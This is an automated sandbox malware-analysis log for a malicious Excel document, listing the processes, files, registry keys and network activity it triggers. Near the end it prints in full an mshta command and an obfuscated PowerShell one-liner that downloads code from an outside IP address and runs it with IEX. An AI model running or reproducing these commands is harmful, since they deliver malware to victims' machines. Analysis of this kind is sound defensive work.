                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCOJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE05F.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: 4173.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032F30CA push 8B4902ADh; iretd 4_3_032F30CF
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032F30CA push 8B4902ADh; iretd 4_3_032F30CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x94782
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)Jump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 2192Thread sleep time: -240000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32094
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32094
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344087 mov eax, dword ptr fs:[00000030h]9_2_00344087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4087 mov eax, dword ptr fs:[00000030h]10_2_001D4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00364087 mov eax, dword ptr fs:[00000030h]11_2_00364087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C4087 mov eax, dword ptr fs:[00000030h]13_2_003C4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00204087 mov eax, dword ptr fs:[00000030h]14_2_00204087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
